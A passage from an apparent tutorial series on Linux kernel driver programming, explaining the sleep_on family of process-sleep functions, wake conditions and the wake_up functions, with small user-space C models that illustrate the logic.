- sleep_on: This function puts the process to sleep in TASK_UNINTERRUPTIBLE mode, which means the process is not woken up if it receives a signal while it is asleep. It is woken only when some other part of the kernel deliberately wakes it (normally on the occurrence of some event) by calling one of the wake-up functions discussed below. Putting a process to sleep with this function can cause problems. For example, if the event the process is waiting for never occurs, the process never returns to the running state. It cannot even be killed with a KILL signal, because a process sleeping in TASK_UNINTERRUPTIBLE mode does not respond to signals until it is woken. A process put to sleep with this function is woken up only when the following condition occurs:

o The process is deliberately woken up by some part of the kernel code on the occurrence of the event for which it was waiting.

- interruptible_sleep_on: This function exists to avoid the problem caused by “sleep_on”. It puts the process to sleep in TASK_INTERRUPTIBLE mode. A process sleeping in this mode is woken up when either of the following conditions occurs:

o The process receives a signal, either from another process or from the kernel itself.
o The process is deliberately woken up by some part of the kernel code on the occurrence of the event for which it was waiting.

- sleep_on_timeout: This function is similar to “sleep_on” but less dangerous, because the sleep is bounded by a timeout. A process put to sleep with this function is woken up when either of the following conditions occurs:

o The time given in the timeout parameter has expired.
o The process is deliberately woken up by some part of the kernel code on the occurrence of the event for which it was waiting.

- interruptible_sleep_on_timeout: I hope by now you can guess what this function does. A process put to sleep with this function is woken up when any of the following conditions occurs:

o The process receives a signal, either from another process or from the kernel itself.
o The time given in the timeout parameter has expired.
o The process is deliberately woken up by some part of the kernel code on the occurrence of the event for which it was waiting.
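The four sets of wake-up conditions above can be condensed into a small decision function. This is a user-space model written only to summarize the lists; the enum names and the function wakes_sleeper are invented for the sketch and do not exist in the kernel.

```c
#include <assert.h>
#include <stdbool.h>

/* Which of the four sleep functions put the process to sleep. */
enum sleep_kind {
    SLEEP_ON,
    INTERRUPTIBLE_SLEEP_ON,
    SLEEP_ON_TIMEOUT,
    INTERRUPTIBLE_SLEEP_ON_TIMEOUT
};

/* What happened while the process was asleep. */
enum wake_reason {
    WAKE_EVENT,    /* kernel code called a wake-up function */
    WAKE_SIGNAL,   /* a signal was sent to the process */
    WAKE_TIMEOUT   /* the timeout expired */
};

/* Return true if the given reason ends the given kind of sleep. */
bool wakes_sleeper(enum sleep_kind kind, enum wake_reason reason)
{
    bool interruptible = (kind == INTERRUPTIBLE_SLEEP_ON ||
                          kind == INTERRUPTIBLE_SLEEP_ON_TIMEOUT);
    bool has_timeout = (kind == SLEEP_ON_TIMEOUT ||
                        kind == INTERRUPTIBLE_SLEEP_ON_TIMEOUT);

    switch (reason) {
    case WAKE_EVENT:
        return true;            /* an explicit wake-up always works */
    case WAKE_SIGNAL:
        return interruptible;   /* only interruptible sleeps react */
    case WAKE_TIMEOUT:
        return has_timeout;     /* only the _timeout variants expire */
    }
    assert(0);                  /* not reached for valid reasons */
    return false;
}
```

Read this way, the only variant with a single way out is sleep_on, which is why a missed event leaves the process stuck.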

Waking up a process:
A process that has been put to sleep must also be woken up by some kernel code, otherwise it will never return to the running state. If your driver puts a process to sleep, it is the responsibility of that driver to wake the sleeping process when the event it is waiting for occurs. For example, if your driver puts a reading process to sleep on its internal wait queue because there is nothing to read (the driver buffer is empty), then it must wake that process whenever new data arrives in the buffer. New data arrives when the device interrupts, so the interrupt handler is responsible for waking the processes sleeping on the driver’s wait queue.

Functions which can be called explicitly to wake up a process:
- wake_up(wait_queue_head_t * wait_queue)
- wake_up_interruptible(wait_queue_head_t * wait_queue)
- wake_up_sync(wait_queue_head_t * wait_queue)
- wake_up_interruptible_sync(wait_queue_head_t * wait_queue)
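The main difference between the first two functions is which sleepers they wake: wake_up wakes processes sleeping in either TASK_INTERRUPTIBLE or TASK_UNINTERRUPTIBLE mode, while wake_up_interruptible wakes only those in TASK_INTERRUPTIBLE mode. The _sync variants, as far as I understand them, select sleepers the same way but hint to the scheduler that the woken process need not preempt the caller right away. The selection can be sketched with the user-space model below. All names in it (sleeper, wake_matching, model_wake_up, model_wake_up_interruptible, the ST_ constants) are hypothetical, and the model leaves out removal of entries from the queue and exclusive waiters.

```c
#include <assert.h>
#include <stddef.h>

/* Modelled process states; the values are chosen for this sketch. */
enum {
    ST_RUNNING = 0,
    ST_INTERRUPTIBLE = 1,
    ST_UNINTERRUPTIBLE = 2
};

/* One sleeping process on a modelled wait queue. */
struct sleeper {
    int pid;
    int state;
    struct sleeper *next;
};

/* Wake every queued sleeper whose state is in mask; return how many. */
int wake_matching(struct sleeper *first, int mask)
{
    int woken = 0;
    struct sleeper *s;

    assert(mask != 0);
    for (s = first; s != NULL; s = s->next) {
        if (s->state & mask) {
            s->state = ST_RUNNING;
            woken++;
        }
    }
    return woken;
}

/* Model of wake_up: both kinds of sleepers are eligible. */
int model_wake_up(struct sleeper *first)
{
    return wake_matching(first, ST_INTERRUPTIBLE | ST_UNINTERRUPTIBLE);
}

/* Model of wake_up_interruptible: only interruptible sleepers. */
int model_wake_up_interruptible(struct sleeper *first)
{
    return wake_matching(first, ST_INTERRUPTIBLE);
}
```

In practice this means a process put to sleep with sleep_on should be woken with wake_up, since wake_up_interruptible would skip it.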


That’s it for this time. In the next article I will cover the ‘ioctl’ interface of devices and the different timing mechanisms available in the Linux kernel.